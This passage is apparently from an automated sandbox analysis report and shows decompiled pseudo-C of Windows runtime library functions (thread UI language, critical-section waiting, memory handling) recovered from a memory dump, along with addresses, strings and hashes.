						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E02966D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E029676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E029F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0295B150();
													}
													_t116 = E029F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E029675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x2a48638; // 0xaa61d0
																	_t122 = L029638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E029676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E029676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0298FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L029670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0298FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0298FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0298FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0298FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0298FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x2a47b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x2a47b84 = _t75;
						_t73 = E0296EB70(_t134, 0x2a47b60);
						if( *0x2a47b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0296FF60( *0x2a47b20);
							}
						}
						goto L5;
					}
				}
			}

0x0298fab0
0x0298fab2
0x0298fab3
0x0298fab4
0x0298fabc
0x0298fac0
0x0298fb14
0x0298fb17
0x0298fac2
0x0298fac8
0x0298facd
0x0298fad3
0x0298fad3
0x0298fadd
0x0298fb18
0x0298fb1b
0x0298fb1d
0x0298fb1e
0x0298fb1f
0x0298fb20
0x0298fb21
0x0298fb22
0x0298fb23
0x0298fb24
0x0298fb25
0x0298fb26
0x0298fb27
0x0298fb28
0x0298fb29
0x0298fb2a
0x0298fb2b
0x0298fb2c
0x0298fb2d
0x0298fb2e
0x0298fb2f
0x0298fb3a
0x0298fb3b
0x0298fb3e
0x0298fb41
0x0298fb44
0x0298fb47
0x0298fb4a
0x0298fb4d
0x0298fb53
0x029cbdcb
0x029cbdcb
0x0298fb59
0x0298fb5b
0x0298fb5b
0x0298fb5e
0x029cbdd5
0x029cbdd8
0x00000000
0x029cbdda
0x00000000
0x029cbdda
0x0298fb64
0x0298fb64
0x0298fb64
0x0298fb67
0x0298fb6e
0x0298fb70
0x0298fb72
0x00000000
0x0298fb78
0x0298fb7a
0x0298fb7a
0x0298fb7d
0x0298fb80
0x029cbddf
0x029cbde1
0x00000000
0x029cbde3
0x00000000
0x029cbde3
0x0298fb86
0x0298fb86
0x0298fb86
0x0298fb8b
0x0298fb90
0x0298fb92
0x0298fb94
0x0298fb9a
0x0298fb9b
0x0298fba1
0x029cbde8
0x029cbdeb
0x029cbded
0x029cbeb5
0x029cbeb5
0x029cbebb
0x029cbebd
0x029cbec3
0x029cbed2
0x029cbedd
0x029cbedd
0x029cbeed
0x00000000
0x029cbdf3
0x029cbdfe
0x029cbe06
0x029cbe0b
0x029cbe0d
0x029cbe0f
0x029cbe14
0x029cbe19
0x029cbe20
0x029cbe25
0x029cbe27
0x029cbe35
0x029cbe39
0x029cbe46
0x029cbe4f
0x029cbe54
0x029cbe56
0x029cbef8
0x029cbef8
0x00000000
0x029cbe5c
0x029cbe5c
0x029cbe60
0x00000000
0x029cbe66
0x029cbe66
0x029cbe7f
0x029cbe84
0x029cbe87
0x029cbe89
0x029cbe8b
0x029cbe99
0x029cbe9d
0x029cbea0
0x029cbeac
0x029cbeaf
0x029cbeb1
0x029cbeb3
0x029cbeb3
0x00000000
0x029cbea2
0x029cbea2
0x00000000
0x029cbea2
0x029cbe8d
0x029cbe8d
0x029cbe92
0x00000000
0x029cbe92
0x029cbe8b
0x029cbe60
0x029cbe3b
0x029cbe3b
0x029cbe3e
0x00000000
0x029cbe40
0x029cbe40
0x029cbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x029cbe44
0x029cbe3e
0x029cbe29
0x029cbe29
0x00000000
0x029cbe29
0x029cbe27
0x00000000
0x0298fba7
0x0298fba7
0x0298fbab
0x029cbf02
0x0298fbb1
0x0298fbb1
0x0298fbb8
0x0298fbbd
0x0298fbbd
0x0298fbbf
0x0298fbbf
0x0298fbc5
0x0298fbcb
0x0298fbf8
0x0298fbf8
0x0298fbfa
0x00000000
0x0298fc00
0x0298fc00
0x0298fc03
0x00000000
0x0298fc09
0x0298fc09
0x0298fc0f
0x0298fc15
0x0298fc23
0x0298fc23
0x0298fc25
0x0298fc27
0x0298fc75
0x0298fc7c
0x0298fc84
0x00000000
0x0298fc29
0x0298fc29
0x0298fc2d
0x0298fc30
0x029cbf0f
0x00000000
0x0298fc36
0x0298fc38
0x0298fc3b
0x0298fc41
0x029cbf17
0x029cbf19
0x029cbf48
0x029cbf4b
0x00000000
0x029cbf1b
0x029cbf22
0x029cbf24
0x029cbf26
0x00000000
0x029cbf2c
0x029cbf37
0x029cbf39
0x029cbf3b
0x00000000
0x029cbf41
0x029cbf41
0x029cbf41
0x029cbf41
0x029cbf45
0x00000000
0x029cbf45
0x029cbf3b
0x029cbf26
0x00000000
0x0298fc47
0x0298fc47
0x0298fc49
0x0298fcb2
0x0298fcb4
0x0298fcb6
0x0298fcdc
0x0298fcdc
0x00000000
0x0298fcb8
0x0298fcc3
0x0298fcc5
0x0298fcc7
0x00000000
0x0298fcc9
0x0298fcc9
0x0298fccd
0x00000000
0x0298fccd
0x0298fcc7
0x00000000
0x0298fc4b
0x0298fc4b
0x0298fc4e
0x0298fc4e
0x0298fc51
0x0298fc51
0x0298fc54
0x0298fc5a
0x0298fc5c
0x0298fc5f
0x0298fc61
0x0298fc63
0x0298fc65
0x0298fc67
0x0298fc6e
0x0298fc72
0x0298fc72
0x0298fc72
0x0298fc72
0x0298fc67
0x0298fc61
0x00000000
0x0298fc5a
0x0298fc49
0x0298fc41
0x0298fc30
0x0298fc27
0x0298fc03
0x0298fbcd
0x0298fbd3
0x0298fbd9
0x0298fbdc
0x0298fbde
0x0298fc99
0x0298fc9b
0x0298fc9d
0x0298fcd5
0x0298fcd5
0x0298fc89
0x0298fc89
0x00000000
0x0298fc9f
0x0298fc9f
0x0298fca3
0x00000000
0x0298fca3
0x00000000
0x0298fbe4
0x0298fbe4
0x0298fbe4
0x0298fbe4
0x0298fbe9
0x0298fbf2
0x00000000
0x0298fbf2
0x0298fbde
0x0298fbcb
0x0298fbab
0x0298fc8b
0x0298fc8b
0x0298fc8c
0x0298fb80
0x0298fb72
0x0298fb5e
0x0298fc8d
0x0298fc91
0x0298fadf
0x0298fadf
0x0298fae1
0x0298fae4
0x0298fae7
0x0298faec
0x0298faf8
0x0298fb00
0x0298fb07
0x0298fb0f
0x0298fb0f
0x0298fb07
0x00000000
0x0298faf8
0x0298fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 029CBE0F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 221a6b8595e423a00ca29cd889284e182cec62822abbaf30b4835e48b53a8b2d
Instruction ID: 543e66cacaa2262e8fb9b82d9ee1120c83c8724dafec611dfd1a57df9b7938c1
Opcode Fuzzy Hash: 221a6b8595e423a00ca29cd889284e182cec62822abbaf30b4835e48b53a8b2d
Instruction Fuzzy Hash: FDA12671B00646CBDB25EF68C464B7AB3E9AF84718F58497DDA06CBB80DB30D941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02952D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E02952D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x2a45350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x2a47bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E029997C0();
				}
				if( *0x2a479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x2a479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E02981624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E02977D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E029EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E02999520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0298E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E029ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x2a46901;
								_push(_t109);
								_v52 = _t98;
								if( *0x2a46901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E02999980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E029995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E02977D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E02977D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E029D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E029EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x2a45350;
							if(_t109 != 0x2a45350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E029EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E029E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x02952d8a
0x02952d8a
0x02952d92
0x02952d96
0x02952d9e
0x02952da0
0x02952da3
0x02952da5
0x02952da8
0x02952dab
0x02952db2
0x029af9aa
0x029af9ab
0x029af9ae
0x029af9ae
0x02952db8
0x02952dc2
0x029af9b9
0x029af9be
0x029af9bf
0x029af9bf
0x02952dcf
0x029af9c9
0x02952dd5
0x02952dd5
0x02952dd5
0x02952dde
0x02952de1
0x02952e70
0x02952e72
0x02952e72
0x02952de7
0x02952deb
0x02952e7c
0x02952e83
0x02952e85
0x02952e8b
0x02952e8d
0x02952e92
0x02952e92
0x02952e85
0x02952df1
0x02952df7
0x02952df9
0x02952df9
0x02952dfc
0x02952dff
0x02952e02
0x00000000
0x02952e05
0x02952e0c
0x029af9d9
0x02952e12
0x02952e12
0x02952e12
0x02952e1a
0x029af9e3
0x029af9e9
0x029af9f0
0x029af9f6
0x029af9f8
0x029af9f8
0x029af9f0
0x02952e23
0x029afa02
0x029afa03
0x029afa05
0x029afa06
0x00000000
0x02952e29
0x02952e29
0x02952e2e
0x02952e34
0x02952e3e
0x00000000
0x00000000
0x02952e44
0x02952e47
0x02952e4d
0x00000000
0x00000000
0x02952e4f
0x02952e54
0x00000000
0x00000000
0x02952e5a
0x02952e5f
0x02952e9a
0x02952ea4
0x02952ea5
0x02952ea8
0x02952eaf
0x02952eb2
0x02952eb5
0x029afae9
0x029afaeb
0x029afaed
0x029afaef
0x029afaf7
0x029afaf8
0x029afafd
0x029afaff
0x029afb04
0x029afb04
0x029afaff
0x02952ec0
0x02952ec4
0x02952ec6
0x02952ec8
0x029afb14
0x029afb18
0x029afb1e
0x029afb21
0x029afb21
0x02952ece
0x02952ece
0x02952ece
0x02952ed7
0x02952e61
0x02952e63
0x029afa6b
0x029afa71
0x029afa76
0x029afa78
0x029afa8a
0x029afa7a
0x029afa83
0x029afa83
0x029afa8f
0x029afa91
0x029afa97
0x029afa9d
0x029afaa4
0x029afaaa
0x029afaaf
0x029afab1
0x029afac3
0x029afab3
0x029afabc
0x029afabc
0x029afac8
0x029afacb
0x029afadf
0x029afadf
0x029afacb
0x029afaa4
0x029afa91
0x02952e6f
0x02952e6f
0x02952e5f
0x029afa13
0x029afa15
0x029afa17
0x029afa1f
0x029afa21
0x029afa22
0x029afa25
0x029afa28
0x029afa2f
0x029afa2f
0x029afa2a
0x029afa2a
0x029afa2a
0x029afa31
0x029afa34
0x029afa36
0x029afa3c
0x029afa3e
0x029afa41
0x029afa43
0x029afa45
0x029afa45
0x029afa41
0x029afa3c
0x029afa4a
0x029afa4f
0x029afa51
0x029afa53
0x029afa56
0x029afa5b
0x029afa5e
0x00000000
0x029afa5e
0x02952e23

Strings

RTL: Re-Waiting, xrefs: 029AFA4A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 405f989c5dcf4ed7d9697948fafc88048b78963c19366b4ff7b9cd13761cc99f
Instruction ID: b9407fbb26d6742682fe1ca3a8c464d7ce0493a9338d215730113fbc3c972a6a
Opcode Fuzzy Hash: 405f989c5dcf4ed7d9697948fafc88048b78963c19366b4ff7b9cd13761cc99f
Instruction Fuzzy Hash: 00612331F007549FDB22DB68C890BBEB7A9EF84318F14066ADC12976D0DB35A941CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 02A20EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02A20EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E02A1FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E02A21074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E02999730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E02A1A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E02A1A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x2a48b04 >> 0x14) + (_v44 -  *0x2a48b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E02977D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02A1138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E02977D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E02A0FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x2a48724 & 0x00000008) != 0) {
						E02A152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E02A215B5(0x2a48ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x02a20eb7
0x02a20eb9
0x02a20ec0
0x02a20ec2
0x02a20ecd
0x02a2105b
0x02a2105b
0x02a21061
0x02a21066
0x02a21066
0x02a2106b
0x02a21073
0x02a21073
0x02a20ed3
0x02a20ed6
0x02a20edc
0x02a20ee0
0x02a20ee7
0x02a20ef0
0x02a20ef5
0x02a20efa
0x02a20efc
0x02a20efd
0x02a20f03
0x02a20f04
0x02a20f06
0x02a20f07
0x02a20f09
0x02a20f0e
0x02a20f14
0x02a20f23
0x02a20f2d
0x02a20f34
0x02a20f34
0x02a20f14
0x02a20f52
0x00000000
0x00000000
0x02a20f58
0x02a20f73
0x02a20f74
0x02a20f79
0x02a20f7d
0x02a20f80
0x02a20f86
0x02a20fab
0x02a20fb5
0x02a20fc6
0x02a20fd1
0x02a20fe3
0x02a20fd3
0x02a20fdc
0x02a20fdc
0x02a20feb
0x02a21009
0x02a21009
0x02a21015
0x02a21027
0x02a21017
0x02a21020
0x02a21020
0x02a2102f
0x02a2103c
0x02a2103c
0x02a21048
0x02a21050
0x02a21050
0x02a21055
0x00000000
0x02a21055
0x02a20f88
0x02a20f9e
0x02a20fa2
0x02a20fa9
0x00000000
0x00000000
0x00000000
0x02a20fa9
0x00000000

Strings

`, xrefs: 02A20F16

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 8c026285a21e2526955298f167f3af43bba8afea5a6355fa53eabe88ca3db9b8
Instruction ID: cb53d5d6ff4016fb6a412c88c8493346c46de81ba4cac09b3c4b95833d9992ab
Opcode Fuzzy Hash: 8c026285a21e2526955298f167f3af43bba8afea5a6355fa53eabe88ca3db9b8
Instruction Fuzzy Hash: 6E5191712483819FD324DF18D9C0B2BB7E6EBC4718F04092DF55697691DB75E80ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0298F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0298F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E02974120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E02999830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E02999990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E029995D0();
							goto L11;
						} else {
